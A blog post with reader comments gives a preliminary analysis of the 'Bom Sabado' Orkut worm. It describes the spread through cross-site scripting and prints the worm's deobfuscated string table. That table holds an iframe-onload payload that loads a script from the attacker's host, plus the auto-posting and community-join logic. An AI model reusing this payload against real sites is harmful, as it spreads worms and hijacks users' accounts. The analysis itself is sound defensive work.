A preliminary analysis of “Bom Sabado” orkut worm

So, today morning I received an email saying I recieved an orkut scrap from a friend with contents “Bom Sabado”.
Within a minute,  I received same scrap from another friend. Now getting the feel that this must be some sort of worm, I decided to open Orkut with firebug logging enabled to see what’s going on.
It turns out that its a typical case of Cross-Site Scripting (XSS), the attacked is able to include and execute its own script from hxxp://tptools.org/worm.js and the contents of scrap are able to by-pass orkut sanitization.

What it does
As soon as someone logs in and visits its scrap page,

  1. Same Scrap is automatically posted to all friends
  2. Automically joins a set of communities[infact, it seems visiting one of these communities is sufficient to get infected] with community IDs 106698808, 6, 558494, 106698628, 106691341


  1. Use ad-block to disable access to hxxp://tptools.org/worm.js
  2. Do not visit any of the aforementioned communities.

How it works(spreads)

The obfuscated script is available at the aforementioned URL, it is obfuscated and simplifying it gives the contents of the script as utilizing the following variable,

var _0x37a1 = [Microsoft.XMLHttp,POST_TOKEN=,CGI.POST_TOKEN,&signature=, Page.signature.raw,POST,Scrapbook?,open, Content-Type,application/x-www-form-urlencoded;, setRequestHeader,&scrapText=,<style/><iframe style=display:none onload=”a = document.createElement( ‘script’);a.src = ‘/’ + ‘/tptools.o’+’rg/worm.js’+’#<wbr>#’; document . body . appendChild( a )”></iframe>Bom Sabado!,&uid=,
&Action.submit=1,send,GET,RequestFriends?req=fl&uid=,uid,&oxh=1,while (true); &&&START&&&,,replace,responseText,CommunityJoin?cmm=,&Action.join=1, 106698808,6,558494,106698628,106691341,var friends = ,;,list,data,id]

  1. It seems that an ill-formed <style/> tag is able to escape Google’s sanitation mechanism resulting into parsing of scrap text as HTML [I might be wrong at this].
  2. The second emphasized section shows the community IDs to which this script autmoatically sends join request.

UPDATE : It seems that the website tptools.org has been removed by the hosting company (host gator)
The scripts (original) and a commented version are attached for the interested readers.

6 Replies to “A preliminary analysis of “Bom Sabado” orkut worm”

  1. A preliminary analysis of ?Bom Sabado? orkut worm « Ashish Bhatia…

    I found your entry interesting do I’ve added a Trackback to it on my weblog :)…

  2. Thanks Rajesh.

  3. So, that’s what you are doing now-a-days.

  4. Yeah, sort of.

  5. its not so much detailed dude nor the code is given by u is exact full code.

  6. 1) It is a preliminary analysis (I posted it when the worm was at its peak)
    2) code is full (please clarify why you think something is missing from the code)

Leave a Reply